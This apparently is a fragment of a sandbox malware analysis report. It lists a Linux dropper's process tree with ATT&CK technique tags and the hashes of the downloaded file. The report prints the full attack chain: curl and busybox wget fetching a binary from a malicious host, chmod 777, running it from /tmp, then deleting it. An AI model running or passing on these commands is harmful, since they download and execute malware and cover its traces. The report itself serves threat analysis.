/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97